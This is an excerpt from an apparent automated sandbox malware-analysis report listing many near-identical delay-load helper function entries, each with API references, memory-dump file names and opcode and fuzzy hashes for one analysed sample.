        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: ba8eb0821315cee051b2cdca624d0fddba84ec80100361f3c878c2a808f27629
        • Instruction ID: 05756df8b771de1a9ecf7cbb892870649f48bd5aef1d73b33720266f37be3369
        • Opcode Fuzzy Hash: ba8eb0821315cee051b2cdca624d0fddba84ec80100361f3c878c2a808f27629
        • Instruction Fuzzy Hash: 84B01289669201BCF78871147D06F37029CC5D0B11770413FF401C4080E7400D46E731
        Function 0013F340 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 2287f3f86ffd50ac8dcd2c5d6e721b0ff35e4bef639170893fbfd54d924524bb
        • Instruction ID: 0e4c09d299e81cc984bfca8c8372b7b86207c19c5dadf6894f86bc38813ca61b
        • Opcode Fuzzy Hash: 2287f3f86ffd50ac8dcd2c5d6e721b0ff35e4bef639170893fbfd54d924524bb
        • Instruction Fuzzy Hash: FAB01285679101BCF3487118BD06F36022CD5D0F117B0413FF401C4084D7400D06AB31
        Function 0013F34A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: df59391b75fe2157329d04d1282a5c0ef793e118c6012da6691025793048aa1d
        • Instruction ID: ba2f42c9c662b1fae9415c1498027cc9a868e2ba705bd094536bc8ef0b190636
        • Opcode Fuzzy Hash: df59391b75fe2157329d04d1282a5c0ef793e118c6012da6691025793048aa1d
        • Instruction Fuzzy Hash: 69B01289669101BCF34871147D06F3B025CC5D0B15770803FF801C4080D7400D06A731
        Function 0013F372 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 33c94bea8c4cd945bb916b0a7f66f139c708ae44244bd9b9518cfa908c29f83f
        • Instruction ID: 160b45635765af0321d7ad49e7b0baefff1d826a5c1cf3b0400cb7afc8265e6a
        • Opcode Fuzzy Hash: 33c94bea8c4cd945bb916b0a7f66f139c708ae44244bd9b9518cfa908c29f83f
        • Instruction Fuzzy Hash: F5B01285669001BCF34871147D06F3A021CC5D0B19770C03FF801C4180D7400D0AA731
        Function 0013F37C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: cd8e1a786d52d263aae49111127554d1a1a92da7e6cfb749ed560927c4afbcd3
        • Instruction ID: 89feef2cf0904cd71e18a1725221346507c634af58414913899ac999929bfff8
        • Opcode Fuzzy Hash: cd8e1a786d52d263aae49111127554d1a1a92da7e6cfb749ed560927c4afbcd3
        • Instruction Fuzzy Hash: A6B01285669101BCF38871147D06F36021CC5D0B15770813FF411C4180D7400D4AA731
        Function 0013F368 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 95ea24b3318fce787914d0cef8b90f6d640c11e73fd7f90d6c00589178f5fd4c
        • Instruction ID: 4eddefe630d99ae7ff70cd129b5c29c0693a5bb1da99a86ede2e080666b00df0
        • Opcode Fuzzy Hash: 95ea24b3318fce787914d0cef8b90f6d640c11e73fd7f90d6c00589178f5fd4c
        • Instruction Fuzzy Hash: B5B01289669101BCF34871147D06F37025CD5D0F117B0403FF401C4080D7400D06A731
        Function 0013F390 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: e023bc7b2c24f9b973a06809f0c306fa877bcb1a9cc4e62d49967859a74fe48d
        • Instruction ID: 50504771dee96765dfa890f7592a86a19153b5321e04db7b73656e5204790380
        • Opcode Fuzzy Hash: e023bc7b2c24f9b973a06809f0c306fa877bcb1a9cc4e62d49967859a74fe48d
        • Instruction Fuzzy Hash: 2BB01285669001FCF34871547D06F36031CD5D0F157B0843FF401C4180D7400D0AA731
        Function 0013F39A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 01ec0566e60204eeddcf581348668fe5d3b24a3d7cae116696660e7e08199338
        • Instruction ID: 75ea7886e20b04463f5dc886458b5600400833f33ff65987435002e9c595a97b
        • Opcode Fuzzy Hash: 01ec0566e60204eeddcf581348668fe5d3b24a3d7cae116696660e7e08199338
        • Instruction Fuzzy Hash: 3BB01295669001BCF34871147D06F3A061DC5D0B15770803FF801C4080D7400E06A731
        Function 0013F386 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 065f8e77749d7040fd0be036f82b4f6fff45c5431a79c551b742da82688fea73
        • Instruction ID: d9a8004e5411b836a4b46d17147669de79694b13c75aaffa2c0a6d86ced54d40
        • Opcode Fuzzy Hash: 065f8e77749d7040fd0be036f82b4f6fff45c5431a79c551b742da82688fea73
        • Instruction Fuzzy Hash: B5B01289669001BCF34871147E06F36021CD5D0B15770803FF401C8180D7900E0FA731
        Function 0013F3B8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 137db633e848cddc73c183b09b3e3b2502019c6cb6e169230381f7a8f6b06f32
        • Instruction ID: 6776489801b3e6e268a0aa7da879a45e12ea850147cad5d66b5ce3eca4aeb982
        • Opcode Fuzzy Hash: 137db633e848cddc73c183b09b3e3b2502019c6cb6e169230381f7a8f6b06f32
        • Instruction Fuzzy Hash: 20B01295669001BCF34871157D06F36021DD5D0F117B0403FF401C8080D7400E06A731
        Function 0013F3AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 1861b05c301796de2851b6854be9fd44fdcebb2b3c34b654658c580e7bcbbfdf
        • Instruction ID: 518bc45a2ac40a9c8cc284ab44ab2db11dd2cab0854973a836197dd96033ea3d
        • Opcode Fuzzy Hash: 1861b05c301796de2851b6854be9fd44fdcebb2b3c34b654658c580e7bcbbfdf
        • Instruction Fuzzy Hash: 2CB01299669001BCF34871147E46F36021DC5D0B11770403FF401C8080D7800F07A731
        Function 0013F3D6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 496624f6038742b6bae43681b9f09040e36bc82aeff1e30aa30cdbab5a3d9f9b
        • Instruction ID: cf766710a7c994c3355f343e58d74e7dd2c1425c837728fd67c41c51bfabac88
        • Opcode Fuzzy Hash: 496624f6038742b6bae43681b9f09040e36bc82aeff1e30aa30cdbab5a3d9f9b
        • Instruction Fuzzy Hash: 12B0128966B001BCF34871147E1AF36021DC5D0B11B70403FF401C8081D7800E07A731
        Function 0013F3CC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: eb0a7cb49340fd4f97374226409598e9fa72d5db8962027e0812380f8bbe664b
        • Instruction ID: 10c934a1a441a9f55b53612496a04f8d650c426fd08279e95ebe38862dda1972
        • Opcode Fuzzy Hash: eb0a7cb49340fd4f97374226409598e9fa72d5db8962027e0812380f8bbe664b
        • Instruction Fuzzy Hash: B2B0129566B101BCF38872147D16F36021DC5D0B11B70413FF401C4081D7400D46A731
        Function 0013F3F4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: d73ac78ed90aa21eaa49ea4edbeb0f8540265517ff5b4a628871eb1e7705cb10
        • Instruction ID: 3a5aece77b6f45f7a2f311c64c25d88fa0ccbe90b68587c435ae8cecbd0559df
        • Opcode Fuzzy Hash: d73ac78ed90aa21eaa49ea4edbeb0f8540265517ff5b4a628871eb1e7705cb10
        • Instruction Fuzzy Hash: 9BB012C5669201BCF388B1147D06F36035CC5D0B11770413FF401C4080D7400D46A731
        Function 0013F3FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 5c1e376dbd4cba1030f2c1be0cff833af56cac9d9083bf4bb07c55eae765635b
        • Instruction ID: 784bcdb39ec9e484b9a3bca632b81bf30b981287771d14edb3f304b973616068
        • Opcode Fuzzy Hash: 5c1e376dbd4cba1030f2c1be0cff833af56cac9d9083bf4bb07c55eae765635b
        • Instruction Fuzzy Hash: FFB012E9669001BCF348B1147E06F36039CC5D0B11B70403FF401C8080D7800E07A731
        Function 0013F3E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 67fb817812774734b82f24f02ac0a37c35f6de487d8d7aa7a43ca301f73d8bf6
        • Instruction ID: 1c9f31cd09bbd4bbe9281f1c98db7e534c0c8ed6a549913ae5f2db41e0ca481c
        • Opcode Fuzzy Hash: 67fb817812774734b82f24f02ac0a37c35f6de487d8d7aa7a43ca301f73d8bf6
